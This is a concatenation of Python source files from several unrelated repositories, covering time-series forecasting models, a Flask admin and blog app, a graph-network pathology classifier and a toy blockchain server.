time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
return series, split_time, x_train, x_valid, time_train, time_valid
def __getitem__(self, index):
start = index * self.step
end = start + self.window_size
window = self.data[start:end]
input_tensor = torch.tensor(window[:self.input_len, None])
target_tensor = torch.tensor(window[self.input_len:, None])
return torch.squeeze(input_tensor), torch.squeeze(target_tensor)
def __len__(self):
return (len(self.data) - self.window_size) // self.step
def _data_trainform(self, data):
return torch.tensor(self.scalar.fit_transform(data.reshape(-1, 1)).reshape(-1))
def _data_reverse_transform(self, data: Tensor):
return torch.tensor(self.scalar.inverse_transform(data.numpy().reshape(-1, 1)).reshape(-1))
if __name__ == "__main__":
dataset = time_series2()
```
#### File: TS-Forecasting/model/DeepAR_Attn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class EncoderRNN(nn.Module):
def __init__(self, input_size=1, hidden_size=10, num_layers=1):
super(EncoderRNN, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.gru = nn.GRU(input_size, hidden_size, batch_first=True, num_layers=num_layers)
self.norm = nn.InstanceNorm1d(hidden_size)
def forward(self, x, hidden):
embedded = self.embedding(x)
output = embedded
output = self.norm(output)
output, hidden = self.gru(output, hidden)
return output, hidden
def initHidden(self, batch_size):
return torch.zeros(1, batch_size, self.hidden_size, device=device)
class AttnDecoderRNN(nn.Module):
def __init__(self, hidden_size=40, output_size=1, input_len=50, dropout_p=0.1, num_layers=1):
super(AttnDecoderRNN, self).__init__()
self.hidden_size = hidden_size
self.output_size = output_size
self.dropout_p = dropout_p
self.input_len = input_len
self.use_layer_combine = True if num_layers > 1 else False
self.embedding = nn.Linear(self.output_size, self.hidden_size)
self.layer_combine = nn.Linear(num_layers * self.hidden_size, self.hidden_size)
self.attn = nn.Linear(self.hidden_size * 2, self.input_len)
self.attn_combine = nn.Linear(self.hidden_size * 2, self.hidden_size)
self.dropout = nn.Dropout(self.dropout_p)
self.gru = nn.GRU(self.hidden_size, self.hidden_size, num_layers=num_layers, batch_first=True)
self.out = nn.Linear(self.hidden_size, self.output_size)
self.norm = nn.InstanceNorm1d(hidden_size)
def forward(self, x, hidden, encoder_outputs):
raw_hidden = hidden
embedded = self.embedding(x)
embedded = self.norm(embedded)
embedded = self.dropout(embedded)
# 当有多层网络的时候融合
if self.use_layer_combine:
hidden = hidden.permute(1, 0, 2)
hidden = self.layer_combine(hidden)
else:
hidden = hidden.permute(1, 0, 2)
attn_weights = F.softmax(self.attn(torch.cat((embedded, hidden), 2)), dim=2)
attn_applied = torch.bmm(attn_weights,
encoder_outputs)
output = torch.cat((embedded, attn_applied), dim=2)
output = self.attn_combine(output)
output = F.relu(output)
output, hidden = self.gru(output, raw_hidden)
output = self.out(output)
return output, hidden, attn_weights
def initHidden(self):
return torch.zeros(1, 1, self.hidden_size, device=device)
class DeepAR_Attn(nn.Module):
def __init__(self, input_size=1, output_size=1, hidden_size=128, input_len=50, pred_len=10):
super(DeepAR_Attn, self).__init__()
self.encoder = EncoderRNN(input_size=input_size, hidden_size=hidden_size)
self.decoder = AttnDecoderRNN(hidden_size=hidden_size, output_size=output_size,
input_len=input_len)
self.input_len = input_len
self.pred_len = pred_len
self.Attn = None
def forward(self, input_tensor, target_tensor):
batch_size = input_tensor.size(0)
input_size = input_tensor.size(2)
encoder_hidden = self.encoder.initHidden(batch_size)
input_length = input_tensor.size(1)
target_length = target_tensor.size(1)
encoder_outputs = torch.zeros(batch_size, input_length, self.encoder.hidden_size, device=device)
for ei in range(input_length):
encoder_output, encoder_hidden = self.encoder(input_tensor[:, ei, None], encoder_hidden)
encoder_outputs[:, ei:ei + 1, :] = encoder_output
decoder_input = input_tensor[:, -1, :].unsqueeze(1)
decoder_hidden = encoder_hidden
teacher_forcing_ratio = 0.5
use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False
decoder_outputs = []
if use_teacher_forcing:
# Teacher forcing: Feed the target as the next input
for di in range(target_length):
decoder_output, decoder_hidden, attn_weights = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
# loss += criterion(decoder_output, target_tensor[di])
decoder_outputs.append(decoder_output)
decoder_input = target_tensor[:, di:di + 1, :] # Teacher forcing
else:
# Without teacher forcing: use its own predictions as the next input
for di in range(target_length):
decoder_output, decoder_hidden, attn_weights = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
decoder_outputs.append(decoder_output)
decoder_outputs = torch.cat(decoder_outputs, dim=1)
return decoder_outputs
def init_hidden(self, batch_size):
return self.encoder.initHidden(batch_size)
if __name__ == '__main__':
# TODO: 测试基础模型
pass
```
#### File: Jin-Xi/TS-Forecasting/NBeats_forecasting.py
```python
import logging
from tqdm import tqdm
from torch.utils.data import DataLoader
import torch
from torch import optim
# from utils.losses import smape_2_loss, mape_loss, mase_loss
from model.N_Beats import NBeatsNet
from data.datasets.time_series import time_series
from data.datasets.futures import futures
from utils.test_model import test_NBeats as test
"""
train_N-Beats!
"""
torch.manual_seed(888)
logger = logging.getLogger('DeepAR.Net')
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def train(model, input_len, output_len):
optimizer = optim.Adam(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, verbose=True)
# losses_dict = {"MAPE": mape_loss, "MASE": mase_loss, "SMAPE": smape_2_loss}
loss_fn = torch.nn.MSELoss()
# train_dataset = time_series(input_len=input_len, pred_len=output_len, type='train')
# train_dataloader = DataLoader(train_dataset, batch_size=4, shuffle=True)
# vali_dataset = time_series(input_len=input_len, pred_len=output_len, type='test')
# vali_dataloader = DataLoader(vali_dataset, batch_size=1, shuffle=False)
train_dataset = futures(root='./data/Corn.csv', input_len=input_len, output_len=output_len,
split_rate=0.8, data_type='train')
train_dataloader = DataLoader(train_dataset, batch_size=16, shuffle=True)
vali_dataset = futures(root='./data/Corn.csv', input_len=input_len, output_len=output_len,
split_rate=0.8, data_type='vali')
vali_dataloader = DataLoader(vali_dataset, batch_size=1, shuffle=False)
global_step = 0
for epoch in range(10000):
count = 0
total_loss = 0
model.train()
train_bar = tqdm(train_dataloader)
for input, target in train_bar:
input = input.cuda()
target = target.cuda()
optimizer.zero_grad()
backcast, forecast = model(input)
loss = loss_fn(forecast, target)
loss.backward()
total_loss += loss.item()
count += 1
global_step += 1
optimizer.step()
if count % 100 == 0:
total_loss /= count
train_bar.desc = '[training] epoch[{}/{}], iter[{}], loss[{}]'.format(epoch, 1000, global_step,
total_loss)
count = 0
total_loss = 0
if epoch % 5 == 0:
vali_loss = test(model, epoch, vali_dataloader)
scheduler.step(vali_loss)
if __name__ == "__main__":
# 不要设置过大除非数据集够长
input_len = 50
output_len = 5
model = NBeatsNet(backcast_length=input_len, forecast_length=output_len,
stack_types=(NBeatsNet.SEASONALITY_BLOCK, NBeatsNet.TREND_BLOCK, NBeatsNet.GENERIC_BLOCK),
nb_blocks_per_stack=3,
thetas_dim=(4, 4, 4), share_weights_in_stack=False, hidden_layer_units=64)
train(model, input_len, output_len)
``` |
{
"source": "jinxiu89/uwget",
"score": 2
} |
#### File: admin/system/language.py
```python
from app.admin import admin
from flask import render_template, request, jsonify, session
from app.forms.language.form import Form
from app.modules.Language import Language
from app.utils.admin.common import packing_error
from app.admin.decorate import require_login
@admin.route('/language', methods=['GET', 'POST'])
@require_login
def admin_language_list():
if request.method == "GET":
data, count = Language.all()
return render_template('admin/language/index.html', data=data, count=count)
@admin.route('/language/add', methods=['GET', 'POST'])
@require_login
def admin_language_add():
form = Form()
if request.method == "GET":
return render_template('admin/language/add.html', form=form)
if request.method == "POST":
if form.validate_on_submit():
result = form.create()
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/language/edit/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_language_edit(id):
form = Form()
data = Language.by_id(id)
if request.method == "GET":
form.name.data = data.name
form.code.data = data.code
form.status.data = data.status
return render_template('admin/language/edit.html', form=form, data=data)
if request.method == "POST":
if form.validate_on_submit():
result = form.update(data)
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/language/stop/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_language_stop(id):
if request.method == "GET":
data = Language.by_id(id)
data.status = 2
result = Language.change_status(data)
return jsonify(result)
@admin.route('/language/start/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_language_start(id):
if request.method == "GET":
data = Language.by_id(id)
data.status = 1
result = Language.change_status(data)
return jsonify(result)
```
#### File: admin/system/role.py
```python
from app.admin import admin
from flask import render_template, request, jsonify, session, url_for
from app.modules.Roles import Roles
from app.modules.PermissionGroup import PermissionGroup as Group
from app.utils.admin.common import packing_error
from app.forms.permission.Role import RoleForm
from app.admin.decorate import require_login
@admin.route('/permission/role', methods=['GET', 'POST'])
@require_login
def admin_permission_role():
if request.method == 'GET':
data, count = Roles.all()
return render_template('admin/permission/role.html', data=data, count=count)
@admin.route('/permission/role/add', methods=['GET', 'POST'])
@require_login
def admin_permission_role_add():
form = RoleForm()
if request.method == 'GET':
return render_template('admin/permission/add_role.html', form=form)
if request.method == 'POST':
if form.validate_on_submit():
result = form.create()
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/permission/role/edit/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_permission_role_edit(id):
form = RoleForm()
data = Roles.by_id(id)
if request.method == "GET":
form.name.data = data.name
return render_template('admin/permission/edit_role.html', form=form, data=data)
if request.method == "POST":
if form.validate_on_submit():
result = form.update(data)
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
@admin.route('/permission/role/setting/<int:id>', methods=['GET', 'POST'])
@require_login
def admin_set_permission(id):
group = Group.with_permission()
return render_template('admin/permission/set_permission.html', group=group)
```
#### File: forms/permission/Role.py
```python
import time
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from app.modules.Base import db
from app.modules.Roles import Roles
class RoleForm(FlaskForm):
name = StringField(label="角色名称", validators=[DataRequired('名称必须输入')], description="角色名称",
render_kw={"id": "name", "class": "input-text size-L", "placeholder": "按照网站功能来切分角色"})
submit = SubmitField(render_kw={"class": "button btn btn-primary radius size-L", 'type': 'button', "value": "提交"})
def create(self):
data = Roles(
name=self.name.data
)
try:
db.session.add(data)
db.session.commit()
return {'status': True, 'message': "创建成功"}
except Exception as e:
db.session.rollback()
return {'status': False, 'message': str(e)}
def update(self, data):
data.name = self.name.data
data.update_time = int(time.time())
try:
db.session.add(data)
db.session.commit()
return {'status': True, 'message': '保存成功'}
except Exception as e:
return {'status': False, 'message': str(e)}
```
#### File: forms/user/reg.py
```python
import uuid
from werkzeug.security import generate_password_hash
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, SubmitField, IntegerField
from wtforms.validators import DataRequired, length, Email, equal_to
from app.modules.Base import db
from app.modules.UserInfo import UserInfo
from app.modules.UserAuths import UserAuth
class RegForm(FlaskForm):
email = StringField(
label="邮箱",
validators=[DataRequired('请输入用户邮箱')],
description="邮箱",
render_kw={
"id": "email",
"class": "input-text size-L",
"placeholder": "<EMAIL>"
}
)
password = StringField(
label="输入密码",
validators=[DataRequired("请输入密码")],
description="密码",
render_kw={
"type": "password",
"class": "input-text size-L",
"id": "password",
"autocomplete": "off",
"placeholder": "密码"
}
)
repassword = StringField(
label="重输密码",
validators=[DataRequired("请输入密码")],
description="验证密码",
render_kw={
"type": "password",
"class": "input-text size-L",
"id": "repassword",
"autocomplete": "off",
"placeholder": "重输密码"
}
)
submit = SubmitField(
render_kw={"class": "btn button btn-primary btn-block radius size-L", 'type': 'button',
"value": " 注 册 "})
def create(self):
User = db.session.query(UserInfo).filter(UserInfo.email == self.email.data).first()
if User is None:
user = UserInfo(
email=self.email.data,
uuid=uuid.uuid4().hex[0:16:2]
)
user.user_auth = [UserAuth(third_type='local',
access_token=generate_password_hash(self.password.data))]
try:
db.session.add(user)
db.session.commit()
except Exception as e:
db.session.rollback()
return {'status': False, 'message': str(e)}
return {'status': True, 'message': "注册成功"}
else:
return {'status': False, 'message': "不能注册!"}
```
#### File: frontend/home/index.py
```python
from app.frontend import frontend
from flask import render_template
from app.modules.Posts import Posts
@frontend.route('/', methods=['GET'])
def frontend_index():
data, count = Posts.all()
return render_template('frontend/home/index.html', data=data, count=count)
@frontend.route('/index', methods=['GET'])
def frontend_index_():
data, count = Posts.all()
return render_template('frontend/home/index.html', data=data, count=count)
```
#### File: frontend/post/details.py
```python
from app.frontend import frontend
from flask import render_template, request
from app.modules.Posts import Posts
from app.forms.posts.form import Comment
@frontend.route('/post/<string:title>.html', methods=['GET'])
def frontend_post_details(title):
form = Comment()
if request.method == 'GET':
result = Posts.by_title(title)
return render_template('frontend/post/details.html', result=result, form=form)
if request.method == 'POST':
if form.validate_on_submit():
result = form.create()
return jsonify(result)
else:
error = packing_error(form.errors)
return jsonify({'status': False, 'message': str(error)})
```
#### File: app/libs/redis.py
```python
from redis import Redis
from config import REDIS_OPTIONS
redis = Redis(**REDIS_OPTIONS)
def get_redis_data(key):
return redis.get(key)
def set_redis_data(key, value):
redis.set(name=key, value=value, ex=600)
```
#### File: app/modules/Comments.py
```python
from .Base import db
from datetime import datetime
class Comments(db.Model):
"""
评论数据表设计,一问一达,当没有任何@时 to_uid 为空
"""
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
uid = db.Column(db.Integer, db.ForeignKey('user_info.id'), comment='评论人')
to_uid = db.Column(db.Integer, default=None, comment='评论哪条评论')
body = db.Column(db.Text, comment='评论内容')
body_html = db.Column(db.Text, comment='转化后的评论内容')
create_time = db.Column(db.DateTime, default=datetime.utcnow(), comment='创建时间')
status = db.Column(db.Boolean, default=False, comment='评论审核')
def __repr__(self):
data = {
"id": self.id,
"post_id": self.post_id,
"uid": self.uid,
"to_uid": self.to_uid,
"body": self.body
}
return '{}'.format(data)
``` |
{
"source": "jinxixiang/PC-TMB",
"score": 2
} |
#### File: PC-TMB/datasets/datasets.py
```python
import os
import torch
from torch.utils.data import DataLoader, Dataset
import h5py
import pandas as pd
import numpy as np
import torch
import torch.nn.functional as F
from .BatchWSI import BatchWSI
class GraphDataset(Dataset):
def __init__(self, df, labels, cfg):
super(GraphDataset, self).__init__()
self.df = df
self.labels = labels
self.cfg = cfg
self.feat_dir = cfg.Data.dataset.feat_dir
self.type_dict = cfg.Data.dataset.type_dict
self.num_type = len(self.type_dict.keys())
def __len__(self):
return len(self.df)
def get_labels(self):
return self.labels
def __getitem__(self, item):
file_name = self.df['image_id'].values[item]
pt_dir = os.path.join(self.feat_dir, f"{file_name}.pt")
feat = torch.load(pt_dir)
bag = BatchWSI.from_data_list([feat])
type = self.type_dict[self.df["type"].values[item]]
type_tensor = F.one_hot(torch.tensor([type]),
num_classes=self.num_type).squeeze()
label = torch.tensor(self.labels[item]).float()
return bag, type_tensor.float(), label.long()
```
#### File: PC-TMB/models/PatchGCN.py
```python
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import Linear, LayerNorm, ReLU
from torch_geometric.nn import GCNConv, GraphConv, GatedGraphConv, GATConv, SGConv, GINConv, GENConv, DeepGCNLayer
from .model_utils import *
from topk import SmoothTop1SVM
class NormalizeFeaturesV2(object):
r"""Column-normalizes node features to sum-up to one."""
def __call__(self, data):
data.x[:, :12] = data.x[:, :12] / data.x[:, :12].max(0, keepdim=True)[0]
return data
def __repr__(self):
return '{}()'.format(self.__class__.__name__)
class NormalizeEdgesV2(object):
r"""Column-normalizes node features to sum-up to one."""
def __call__(self, data):
data.edge_attr = data.edge_attr.type(torch.cuda.FloatTensor)
data.edge_attr = data.edge_attr / data.edge_attr.max(0, keepdim=True)[0]
return data
def __repr__(self):
return '{}()'.format(self.__class__.__name__)
class PatchGCN(torch.nn.Module):
def __init__(self, input_dim=1024, num_layers=4, edge_agg='spatial',
hidden_dim=128, dropout=0.25, n_classes=4, num_types=7, k_sample=8,
instance_loss_fn=SmoothTop1SVM(n_classes=2)):
super(PatchGCN, self).__init__()
size = [input_dim, num_layers * hidden_dim, 128]
self.edge_agg = edge_agg
self.num_layers = num_layers - 1
self.n_classes = n_classes
self.fc_in = nn.Sequential(*[nn.Linear(size[0], size[2]), nn.ReLU(), nn.Dropout(0.25)])
self.layers = torch.nn.ModuleList()
for i in range(1, self.num_layers + 1):
conv = GENConv(hidden_dim, hidden_dim, aggr='softmax',
t=1.0, learn_t=True, num_layers=2, norm='layer')
norm = LayerNorm(hidden_dim, elementwise_affine=True)
act = ReLU(inplace=True)
layer = DeepGCNLayer(conv, norm, act, block='res', dropout=0.1, ckpt_grad=False)
self.layers.append(layer)
# self.path_phi = nn.Sequential(*[nn.Linear(hidden_dim*4, hidden_dim*4), nn.ReLU(), nn.Dropout(0.25)])
self.path_attention_head = Attn_Net_Gated(L=size[1], D=size[1], dropout=dropout, n_classes=n_classes)
# self.path_rho = nn.Sequential(*[nn.Linear(hidden_dim*4, hidden_dim*4), nn.ReLU(), nn.Dropout(dropout)])
self.fc_type = nn.Linear(num_types, size[2])
bag_classifiers = [nn.Linear(size[1] + size[2], 1) for i in
range(n_classes)] # use an indepdent linear layer to predict each class
self.classifiers = nn.ModuleList(bag_classifiers)
instance_classifiers = [nn.Linear(size[1], 2) for i in range(n_classes)]
self.instance_classifiers = nn.ModuleList(instance_classifiers)
self.k_sample = k_sample
self.instance_loss_fn = instance_loss_fn.cuda()
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_normal_(m.weight)
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm1d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
@staticmethod
def create_positive_targets(length, device):
return torch.full((length,), 1, device=device, dtype=torch.uint8).long()
@staticmethod
def create_negative_targets(length, device):
return torch.full((length,), 0, device=device, dtype=torch.uint8).long()
# instance-level evaluation for in-the-class attention branch
def inst_eval(self, A, h, classifier):
device = h.device
if len(A.shape) == 1:
A = A.view(1, -1)
# print(f"inst_eval top k: {A.shape}")
top_p_ids = torch.topk(A, self.k_sample)[1][-1]
top_p = torch.index_select(h, dim=0, index=top_p_ids)
top_n_ids = torch.topk(-A, self.k_sample, dim=1)[1][-1]
top_n = torch.index_select(h, dim=0, index=top_n_ids)
p_targets = self.create_positive_targets(self.k_sample, device)
n_targets = self.create_negative_targets(self.k_sample, device)
all_targets = torch.cat([p_targets, n_targets], dim=0)
all_instances = torch.cat([top_p, top_n], dim=0)
logits = classifier(all_instances)
all_preds = torch.topk(logits, 1, dim=1)[1].squeeze(1)
instance_loss = self.instance_loss_fn(logits, all_targets)
return instance_loss, all_preds, all_targets
# instance-level evaluation for out-of-the-class attention branch
def inst_eval_out(self, A, h, classifier):
device = h.device
if len(A.shape) == 1:
A = A.view(1, -1)
top_p_ids = torch.topk(A, self.k_sample)[1][-1]
top_p = torch.index_select(h, dim=0, index=top_p_ids)
p_targets = self.create_negative_targets(self.k_sample, device)
logits = classifier(top_p)
p_preds = torch.topk(logits, 1, dim=1)[1].squeeze(1)
instance_loss = self.instance_loss_fn(logits, p_targets)
return instance_loss, p_preds, p_targets
def forward(self, x_path, type, label=None, instance_eval=False):
# GCN convolution input: (bsz, bag_size, feat_dim) output: (bsz, bag_size, hidden_dim)
data = x_path
device = data.x.device
if self.edge_agg == 'spatial':
edge_index = data.edge_index
elif self.edge_agg == 'latent':
edge_index = data.edge_latent
edge_attr = None
x = self.fc_in(data.x)
x_ = x
x = self.layers[0].conv(x_, edge_index, edge_attr)
x_ = torch.cat([x_, x], axis=1)
for layer in self.layers[1:]:
x = layer(x, edge_index, edge_attr)
x_ = torch.cat([x_, x], axis=1)
h_path = x_
# h_path = self.path_phi(h_path)
# end of GCN
# attention network forward
A, h = self.path_attention_head(h_path)
A = torch.transpose(A, 1, 0)
A = F.softmax(A, dim=1)
# instance loss
if instance_eval:
total_inst_loss = 0.0
inst_labels = F.one_hot(label, num_classes=self.n_classes).squeeze() # binarize label
for i in range(len(self.instance_classifiers)):
inst_label = inst_labels[i].item()
classifier = self.instance_classifiers[i]
if inst_label == 1: # in-the-class:
instance_loss, preds, targets = self.inst_eval(A[i], h, classifier)
else: # out-of-the-class
continue
total_inst_loss += instance_loss
# attention pooling
M = torch.mm(A, h)
type_feature = self.fc_type(type).squeeze()
# classifier
logits = torch.empty(1, self.n_classes).float().to(device)
for c in range(self.n_classes):
M_fused = torch.cat((M[c], type_feature), dim=-1)
logits[0, c] = self.classifiers[c](M_fused)
Y_hat = torch.topk(logits, 1, dim=1)[1]
Y_prob = F.softmax(logits, dim=1)
if instance_eval:
results_dict = {'instance_loss': total_inst_loss}
else:
results_dict = {}
return logits, Y_prob, Y_hat, results_dict
```
#### File: jinxixiang/PC-TMB/trainer.py
```python
import torch
import torch.nn as nn
import torch_optimizer as optim
import pandas as pd
# customized libs
import criterions
import models
import datasets
def get_model(conf):
net = getattr(models, conf.Model.base)
return net(**conf.Model.params)
def get_loss(conf):
conf_loss = conf.Loss.base_loss
assert hasattr(nn, conf_loss.name) or hasattr(criterions, conf_loss.name)
loss = None
if hasattr(nn, conf_loss.name):
loss = getattr(nn, conf_loss.name)
elif hasattr(criterions, conf_loss.name):
loss = getattr(criterions, conf_loss.name)
if len(conf_loss.weight) > 0:
weight = torch.Tensor(conf_loss.weight)
conf_loss["weight"] = weight
return loss(**conf_loss.params)
def get_optimizer(conf):
conf_optim = conf.Optimizer
name = conf_optim.optimizer.name
if hasattr(torch.optim, name):
optimizer_cls = getattr(torch.optim, name)
else:
optimizer_cls = getattr(optim, name)
if hasattr(conf_optim, "lr_scheduler"):
scheduler_cls = getattr(torch.optim.lr_scheduler, conf_optim.lr_scheduler.name)
else:
scheduler_cls = None
return optimizer_cls, scheduler_cls
def get_dataset(conf, kfold, mode='train'):
folds_csv = pd.read_csv(conf.General.folds)
if conf.General.cross_validation:
if mode == 'train':
data_idx = folds_csv[folds_csv['fold'] != kfold].index
else:
data_idx = folds_csv[folds_csv['fold'] == kfold].index
else:
data_idx = folds_csv[folds_csv['fold'] == mode].index
name = conf.Data.dataset.name
dataset_cls = getattr(datasets, name)
dataset_ = dataset_cls(folds_csv.loc[data_idx].reset_index(drop=True),
folds_csv.loc[data_idx].reset_index(drop=True)[conf.General.target_col],
conf)
return dataset_
```
#### File: PC-TMB/utils/utils.py
```python
import yaml
import numpy as np
from addict import Dict
import albumentations as A
from sklearn.metrics import roc_auc_score, roc_curve
from collections import defaultdict
import torch
from torch.optim.optimizer import Optimizer
from typing import Iterator, List, Optional, Union
from torch.utils.data import DistributedSampler, Dataset, Sampler
from operator import itemgetter
class DatasetFromSampler(Dataset):
"""Dataset to create indexes from `Sampler`.
Args:
sampler: PyTorch sampler
"""
def __init__(self, sampler: Sampler):
"""Initialisation for DatasetFromSampler."""
self.sampler = sampler
self.sampler_list = None
def __getitem__(self, index: int):
"""Gets element of the dataset.
Args:
index: index of the element in the dataset
Returns:
Single element by index
"""
if self.sampler_list is None:
self.sampler_list = list(self.sampler)
return self.sampler_list[index]
def __len__(self) -> int:
"""
Returns:
int: length of the dataset
"""
return len(self.sampler)
class DistributedSamplerWrapper(DistributedSampler):
"""
Wrapper over `Sampler` for distributed training.
Allows you to use any sampler in distributed mode.
It is especially useful in conjunction with
`torch.nn.parallel.DistributedDataParallel`. In such case, each
process can pass a DistributedSamplerWrapper instance as a DataLoader
sampler, and load a subset of subsampled data of the original dataset
that is exclusive to it.
.. note::
Sampler is assumed to be of constant size.
"""
def __init__(
self,
sampler,
num_replicas: Optional[int] = None,
rank: Optional[int] = None,
shuffle: bool = True,
):
"""
Args:
sampler: Sampler used for subsampling
num_replicas (int, optional): Number of processes participating in
distributed training
rank (int, optional): Rank of the current process
within ``num_replicas``
shuffle (bool, optional): If true (default),
sampler will shuffle the indices
"""
super(DistributedSamplerWrapper, self).__init__(
DatasetFromSampler(sampler), num_replicas=num_replicas, rank=rank, shuffle=shuffle
)
self.sampler = sampler
def __iter__(self) -> Iterator[int]:
"""Iterate over sampler.
Returns:
python iterator
"""
self.dataset = DatasetFromSampler(self.sampler)
indexes_of_indexes = super().__iter__()
subsampler_indexes = self.dataset
return iter(itemgetter(*indexes_of_indexes)(subsampler_indexes))
class Accuracy_Logger(object):
"""Accuracy logger"""
def __init__(self, n_classes):
super(Accuracy_Logger, self).__init__()
self.n_classes = n_classes
self.labels = []
self.probs = []
self.initialize()
def initialize(self):
self.data = [{"count": 0, "correct": 0} for i in range(self.n_classes)]
def log(self, Y_hat, Y):
Y_hat = int(Y_hat)
Y = int(Y)
self.data[Y]["count"] += 1
self.data[Y]["correct"] += (Y_hat == Y)
def log_prob(self, labels, prob):
self.labels.append(labels)
self.probs.append(prob)
def log_batch(self, Y_hat, Y):
Y_hat = np.array(Y_hat).astype(int)
Y = np.array(Y).astype(int)
for label_class in np.unique(Y):
cls_mask = Y == label_class
self.data[label_class]["count"] += cls_mask.sum()
self.data[label_class]["correct"] += (Y_hat[cls_mask] == Y[cls_mask]).sum()
def get_summary(self, c):
count = self.data[c]["count"]
correct = self.data[c]["correct"]
if count == 0:
acc = None
else:
acc = float(correct) / count
return acc, correct, count
def get_summary_final(self, curve_name):
count = 0.0
correct = 0.0
for c in range(self.n_classes):
count += self.data[c]["count"]
correct += self.data[c]["correct"]
acc = float(correct) / count
self.labels = np.concatenate(self.labels)
self.probs = np.concatenate(self.probs)
if self.n_classes == 2:
auc = roc_auc_score(self.labels, self.probs)
else:
auc = roc_auc_score(self.labels, self.probs, multi_class='ovr')
np.save(f"./results/{curve_name}_probs.npy", self.probs)
np.save(f"./results/{curve_name}_labels.npy", self.labels)
return acc, auc
def read_yaml(fpath="./configs/sample.yaml"):
with open(fpath, mode="r") as file:
yml = yaml.load(file, Loader=yaml.Loader)
return Dict(yml)
``` |
{
"source": "JinXJinX/flask-template",
"score": 2
} |
#### File: app/views/foo.py
```python
from flask import render_template, request, redirect
from app import app
from app.dblogic import blog as blog_db
@app.route("/")
def index():
return "Hello World!"
@app.route("/blog_list")
def blog_list():
blogs = list(blog_db.get_all_blog())
print(blogs)
data = {
"blogs": blogs
}
return render_template("blog_list.html", **data)
@app.route("/blog_new")
def blog_new():
args = request.args
title = args.get("title")
content = args.get("content")
rst = blog_db.add_blog(title, content)
return redirect("/blog_list")
@app.route("/blog_delete/<id>")
def blog_delete(id):
raise NotImplementedError()
``` |
{
"source": "JinXJinX/toychain",
"score": 3
} |
#### File: toychain/src/server.py
```python
from urllib.parse import urlparse
from flask import Flask, jsonify, request
import toychain
from miner import Miner
import settings
app = Flask(__name__)
tc = None
miner = None
def init():
global tc
global miner
pvt_key = app.config.get('PVT_KEY')
tc = toychain.ToyChain(app.config['PORT'], pvt_key=pvt_key)
if not pvt_key:
filename = app.config['CONFIG_FILENAME']
with open(f'{filename}.py', 'a') as f:
f.write(f'PVT_KEY = \'\'\'{tc.get_pvt_key()}\'\'\'')
print(tc.get_address())
if app.config['MINING']:
miner = Miner(tc)
miner.start()
@app.route('/add_node', methods=['POST'])
def add_node():
"""
Receive new node, add it to register node list, and broadcast it
"""
ip = request.remote_addr
data = request.get_json() or {}
port = data.get('node', {}).get('port')
if not port:
return jsonify({'ok': False}), 200
node = f'{ip}:{port}'
rst = tc.add_node(node)
return jsonify({'ok': rst}), 200
@app.route('/add_tx', methods=['POST'])
def add_tx():
"""
Receive new tx, verify it then broadcast it
"""
data = request.get_json() or {}
tx = data.get('tx')
rst = tc.add_tx(tx)
return jsonify({'ok': rst}), 200
@app.route('/add_block', methods=['POST'])
def add_block():
"""
Receive new block, verify it then add it to chain and broadcast it
"""
ip = request.remote_addr
data = request.get_json() or {}
block = data.get('block')
port = data.get('port')
if not block or not port:
return jsonify({'ok': False}), 200
node = f'{ip}:{port}'
rst = tc.add_block(block, node)
# TODO if mining, stop the mining thread
return jsonify({'ok': rst}), 200
@app.route('/get_block/<int:height>', methods=['GET'])
def get_block(height):
"""
Get block by height/idx
"""
chain = tc.get_chain()
if height >= len(chain):
return jsonify({'ok': False}), 200
response = {
'ok': True,
'block': chain[height]
}
return jsonify(response), 200
@app.route('/get_last_block', methods=['GET'])
def get_last_block():
"""
Get the lastest block in the chain
"""
chain = tc.get_chain()
response = {
'ok': True,
'block': chain[-1],
'height': len(chain)-1,
}
return jsonify(response), 200
@app.route('/get_node', methods=['GET'])
def get_node():
"""
Get a list of registered nodes
"""
response = {
'ok': True,
'nodes': tc.get_nodes()
}
return jsonify(response), 200
@app.route('/get_ledger', methods=['GET'])
def get_ledger():
"""
Get a list of ledger
"""
response = {
'ok': True,
'ledger': tc.get_ledger()
}
return jsonify(response), 200
@app.route('/ping', methods=['GET'])
def ping():
"""
ping
"""
return jsonify({'ok': True}), 200
```
#### File: toychain/src/toychain.py
```python
import time
from Crypto.PublicKey import RSA
import requests
import settings
import utils
import verifier as vf
class ToyChain:
def __init__(self, port, pvt_key=None,
version=settings.VERSION, node=True):
# TODO use private variables
self.tx_pool = []
self.version = version
self.port = port
self.nodes = utils.get_nodes(port)
self.ledger = {}
self.pvt_key = utils.new_rsa_key(pvt_key)
self.pub_key = self.pvt_key.publickey().exportKey().decode()
self.address = utils.pub_2_address(self.pub_key)
if node:
self.init_chain()
def new_block(self):
"""
Mining a new block.
"""
chain = self.chain
header = {
'version': self.version,
'ts': time.time(),
'prev_hash': '' if not chain else chain[-1]['hash'],
'nonce': '0',
'target': self.get_target(),
# TODO merkle root
}
